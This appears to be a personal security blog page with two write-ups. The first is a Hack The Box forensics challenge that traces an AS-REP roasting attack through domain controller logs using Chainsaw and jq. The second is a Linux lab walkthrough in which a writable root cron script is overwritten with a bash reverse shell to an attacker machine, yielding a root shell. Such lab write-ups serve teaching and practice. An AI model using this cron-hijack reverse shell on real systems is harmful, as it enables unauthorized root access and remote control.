    0010  5f 63 75 35 37 30 6d 5f 70 32 30 37 30 63 30 31  _cu570m_p2070c01
    0020  5f 34 32 33 5f 6e 30 37 5f 33 6e 30 75 39 68 37  _423_n07_3n0u9h7
    0030  7d                                               }
  ASCII          : ...HTB{50m371m35_cu570m_p2070c01_423_n07_3n0u9h7}
========================================================================
. . .[SNIP]. . .

That’s it.

Happy Hacking!

GitHub
Mail



HTB Campfire-2 - DFIR (Very Easy)
Sulaiman — Sat, 28 Feb 2026 16:21:10 GMT
From HTB: Forela's Network is constantly under attack. The security system raised an alert about an old admin account requesting a ticket from KDC on a domain controller. 
Inventory shows that this user account is not used as of now so you are tasked to take a look at this. This may be an AS-REP roasting attack as anyone can request any user's ticket which has preauthentication disabled.
Tools:
Chainsaw
Key Learning:
Log Analysis
Task
When did the AS-REP Roasting attack occur, and when did the attacker request the Kerberos ticket for the vulnerable user
Please confirm the User Account that was targeted by the attacker.
What was the SID of the account?
It is crucial to identify the compromised user account and the workstation responsible for this attack. Please list the internal IP address of the compromised asset to assist our threat-hunting team.
We do not have any artifacts from the source machine yet. Using the same DC Security logs, can you confirm the user account used to perform the ASREP Roasting attack so we can contain the compromised account/s?
Supposed this would be fun and manage-able, I believe if we’re doing this attack it would be count as easy as-well so we can have a-bit of psychological guess of how the attack went through.
┌──(kali㉿kali)-[~]
└─$ ll          
total 1248
-rw-r--r-- 1 root root 1118208 May 29  2024 Security.evtx
All we got here at this case is a singular file, let’s hunt it first with Chainsaw and SIGMA rules and copy a convert to JSON file to make it easier:
┌──(kali㉿kali)-[~]
└─$ chainsaw hunt --sigma sigma --mapping sigma-event-logs-all.yml Security.evtx

 ██████╗██╗  ██╗ █████╗ ██╗███╗   ██╗███████╗ █████╗ ██╗    ██╗
██╔════╝██║  ██║██╔══██╗██║████╗  ██║██╔════╝██╔══██╗██║    ██║
██║     ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║
██║     ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║
╚██████╗██║  ██║██║  ██║██║██║ ╚████║███████║██║  ██║╚███╔███╔╝
 ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝ ╚══╝╚══╝
    By WithSecure Countercept (@FranticTyping, @AlexKornitzer)

[+] Loading detection rules from:
[!] Loaded 3448 detection rules (508 not loaded)
[+] Loading forensic artefacts from: Security.evtx (extensions: .evt, .evtx)
[+] Loaded 1 forensic artefacts (1.1 MiB)
[+] Current Artifact: Security.evtx
[+] Hunting [========================================] 1/1   [00:00:00]                                                                                                                                                                      
[+] Group: Sigma                                                                                                                                                                                                                             
┌─────────────────────┬───────────────────────────┬───────┬────────────────────────────────┬──────────┬───────────┬───────────────────┬────────────────────────────────┐
│      timestamp      │        detections         │ count │     Event.System.Provider      │ Event ID │ Record ID │     Computer      │           Event Data           │
├─────────────────────┼───────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼───────────────────┼────────────────────────────────┤
│ 2024-05-29 06:35:09 │ ‣ Scheduled Task Deletion │ 1     │ Microsoft-Windows-Security-Aud │ 4699     │ 6225      │ DC01.forela.local │ TaskContent: ''                │
│                     │                           │       │ iting                          │          │           │                   │ FQDN: DC01.forela.local        │
│                     │                           │       │                                │          │           │                   │ SubjectDomainName: FORELA      │
│                     │                           │       │                                │          │           │                   │ ClientProcessId: 4448          │
│                     │                           │       │                                │          │           │                   │ SubjectUserSid: S-1-5-21-32394 │
│                     │                           │       │                                │          │           │                   │ 15629-1862073780-2394361899-50 │
│                     │                           │       │                                │          │           │                   │ 0                              │
│                     │                           │       │                                │          │           │                   │ TaskName: \CreateExplorerShell │
│                     │                           │       │                                │          │           │                   │ UnelevatedTask                 │
│                     │                           │       │                                │          │           │                   │ ClientProcessStartKey: 3096224 │
│                     │                           │       │                                │          │           │                   │ 743817332                      │
│                     │                           │       │                                │          │           │                   │ SubjectLogonId: '0x54484'      │
│                     │                           │       │                                │          │           │                   │ SubjectUserName: Administrator │
│                     │                           │       │                                │          │           │                   │ ParentProcessId: 5520          │
│                     │                           │       │                                │          │           │                   │ RpcCallClientLocality: 0       │
├─────────────────────┼───────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼───────────────────┼────────────────────────────────┤
│ 2024-05-29 06:35:09 │ ‣ Rare Schtasks Creations │ 2     │                                │          │           │                   │                                │
├─────────────────────┼───────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼───────────────────┼────────────────────────────────┤
│ 2024-05-29 06:39:54 │ ‣ Scheduled Task Deletion │ 1     │ Microsoft-Windows-Security-Aud │ 4699     │ 6304      │ DC01.forela.local │ TaskContent: ''                │
│                     │                           │       │ iting                          │          │           │                   │ FQDN: DC01.forela.local        │
│                     │                           │       │                                │          │           │                   │ SubjectDomainName: FORELA      │
│                     │                           │       │                                │          │           │                   │ ClientProcessId: 5212          │
│                     │                           │       │                                │          │           │                   │ SubjectUserSid: S-1-5-21-32394 │
│                     │                           │       │                                │          │           │                   │ 15629-1862073780-2394361899-50 │
│                     │                           │       │                                │          │           │                   │ 0                              │
│                     │                           │       │                                │          │           │                   │ TaskName: \CreateExplorerShell │
│                     │                           │       │                                │          │           │                   │ UnelevatedTask                 │
│                     │                           │       │                                │          │           │                   │ ClientProcessStartKey: 3377699 │
│                     │                           │       │                                │          │           │                   │ 720527986                      │
│                     │                           │       │                                │          │           │                   │ SubjectLogonId: '0x52c5a'      │
│                     │                           │       │                                │          │           │                   │ SubjectUserName: Administrator │
│                     │                           │       │                                │          │           │                   │ ParentProcessId: 2600          │
│                     │                           │       │                                │          │           │                   │ RpcCallClientLocality: 0       │
└─────────────────────┴───────────────────────────┴───────┴────────────────────────────────┴──────────┴───────────┴───────────────────┴────────────────────────────────┘

[+] 3 Detections found on 3 documents
Here we got domain and Administrator SID:
DC01.forela.local  
S-1-5-21-3239415629-1862073780-2394361899-500
Let’s convert it to JSON file:
┌──(kali㉿kali)-[~]
└─$ sudo evtx_dump -o jsonl -t 1 -f Security.json Security.evtx 
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ ll          
total 1248
-rw-r--r-- 1 root root 1118208 May 29  2024 Security.evtx
-rw-r--r-- 1 root root  158868 Feb 28 15:36 Security.json
┌──(kali㉿kali)-[~]
└─$ wc -l Security.json
152 Security.json
When you open it it’s LONG, use JQ later on!
Okay now let’s look-up for 2 main question regarding AS-REP roast, to be catching it faster we Know AS-REP roast Event id is 4768:
Which we have several:
┌──(kali㉿kali)-[~]
└─$ cat Security.json | jq . | grep 4768
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
Let’s filter for PreAuth
┌──(kali㉿kali)-[~]
└─$ cat Security.json | jq . | grep PreAuth
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "0",
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "2",
Dope, as we here there’s multiple PreAuthType, and only one of them are labeled “0“, which there’s an Activity related to AS-REP roast there.
PS: PreAuthType as 0 means there’s no Pre-Authentication, meaning that Event ID lines could answer Number 1,2, and 3.
┌──(kali㉿kali)-[~]
└─$ cat Security.json | jq '.Event | select(.EventData.PreAuthType =="0")'
{
  "#attributes": {
    "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
  },
  "System": {
    "Provider": {
      "#attributes": {
        "Name": "Microsoft-Windows-Security-Auditing",
        "Guid": "54849625-5478-4994-A5BA-3E3B0328C30D"
      }
    },
    "EventID": 4768,
    "Version": 0,
    "Level": 0,
    "Task": 14339,
    "Opcode": 0,
    "Keywords": "0x8020000000000000",
    "TimeCreated": {
      "#attributes": {
        "SystemTime": "2024-05-29T06:36:40.246362Z"
      }
    },
    "EventRecordID": 6241,
    "Correlation": null,
    "Execution": {
      "#attributes": {
        "ProcessID": 752,
        "ThreadID": 3188
      }
    },
    "Channel": "Security",
    "Computer": "DC01.forela.local",
    "Security": null
  },
  "EventData": {
    "TargetUserName": "arthur.kyle",
    "TargetDomainName": "forela.local",
    "TargetSid": "S-1-5-21-3239415629-1862073780-2394361899-1601",
    "ServiceName": "krbtgt",
    "ServiceSid": "S-1-5-21-3239415629-1862073780-2394361899-502",
    "TicketOptions": "0x40800010",
    "Status": "0x0",
    "TicketEncryptionType": "0x17",
    "PreAuthType": "0",
    "IpAddress": "::ffff:172.17.79.129",
    "IpPort": "61965",
    "CertIssuerName": "",
    "CertSerialNumber": "",
    "CertThumbprint": ""
  }
}
Dope!
Next we’re asked for IP Address, if we’re just filtering the whole JSON file, we got multiple IP:
┌──(kali㉿kali)-[~]
└─$ cat Security.json | jq . | grep IpAddress                             
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "172.17.79.4",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "fe80::35a9:2032:4461:eefa",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "fe80::35a9:2032:4461:eefa",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::ffff:172.17.79.129",
      "IpAddress": "::ffff:172.17.79.129",
      "IpAddress": "172.17.79.129",
      "IpAddress": "172.17.79.129",
      "IpAddress": "172.17.79.129",
      "IpAddress": "172.17.79.129",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "172.17.79.4",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "fe80::35a9:2032:4461:eefa",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "fe80::35a9:2032:4461:eefa",
Which is dope and reduces some effort.
And we can just, re-use the earlier filters and Add the IP address of that Event:
┌──(kali㉿kali)-[~]
└─$ cat Security.json | jq '.Event | select(.EventData.PreAuthType =="0") | .EventData.IpAddress'   
"::ffff:172.17.79.129"
The IPv4 is: 172.17.79.129
Amazing!
Lastly we’re asked another Kerberos related, focused on the DC which we’re looking for logon.
┌──(kali㉿kali)-[~]
└─$ cat Security.json | grep 172.17.79.129 | jq .Event.System.EventID 
4768
4769
5140
5140
5140
5140
Oh yeah, 4769 meaning 1 point higher than the AS-REP roast earlier could be key finding, event ID of 5140 can also being an indication when network share object was used.
┌──(kali㉿kali)-[~]
└─$ cat Security.json | grep 172.17.79.129 | jq . | grep TargetUserName
      "TargetUserName": "arthur.kyle",
      "TargetUserName": "happy.grunwald@FORELA.LOCAL",
Great, we found another User.
┌──(kali㉿kali)-[~]
└─$ cat Security.json | jq '. | select(.Event.System.EventID == 4769)' | grep happy.grunwald
      "TargetUserName": "happy.grunwald@FORELA.LOCAL",
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ cat Security.json | jq '. | select(.Event.System.EventID == 5140)' | grep happy.grunwald
      "SubjectUserName": "happy.grunwald",
      "SubjectUserName": "happy.grunwald",
      "SubjectUserName": "happy.grunwald",
I believe that’s basically all of it and our review supposed to be enough for analysis report:
When did the AS-REP Roasting attack occur, and when did the attacker request the Kerberos ticket for the vulnerable user?
2024-05-29 06:36:40
Please confirm the User Account that was targeted by the attacker.
arthur.kyle
What was the SID of the account?
S-1-5-21-3239415629-1862073780-2394361899-1601
It is crucial to identify the compromised user account and the workstation responsible for this attack. Please list the internal IP address of the compromised asset to assist our threat-hunting team.
172.17.79.129
We do not have any artifacts from the source machine yet. Using the same DC Security logs, can you confirm the user account used to perform the ASREP Roasting attack so we can contain the compromised account/s?
happy.grunwald
labs.hackthebox.com/achievement/sherlock/2489228/736
Happy Defending, Thanks HackTheBox
GitHub
Mail


Cron Hijacking 101: Linux Privilege Escalation
Sulaiman — Fri, 27 Feb 2026 09:35:43 GMT
Enumeration
On target:
user@debian:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh

user@debian:/tmp$ locate overwrite.sh
locate: warning: database `/var/cache/locate/locatedb' is more than 8 days old (actual age is 2114.0 days)
/usr/local/bin/overwrite.sh
user@debian:/tmp$ ls -al /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13  2017 /usr/local/bin/overwrite.sh
As we see, there’s a Crontab activity owned by root on a specific directory, reminder this is our current User access:
user@debian:/tmp$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
Attack
How can we abuse?
user@debian:/tmp$ vi /usr/local/bin/overwrite.sh
user@debian:/tmp$ cat /usr/local/bin/overwrite.sh
#!/bin/bash

bash -i >& /dev/tcp/192.168.203.73/9001 0>&1
By changing the Shell script into reverse-shell to Our Kali attack machine, the next Cron task running it will be calling back to Us.
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 9001      
listening on [any] 9001 ...
And. . .Profitt!!
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 9001      
listening on [any] 9001 ...
connect to [192.168.203.73] from (UNKNOWN) [10.48.161.11] 51886
bash: no job control in this shell
root@debian:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@debian:~# whoami
whoami
root
Hope you all like it and happy hacking!
GitHub
Mail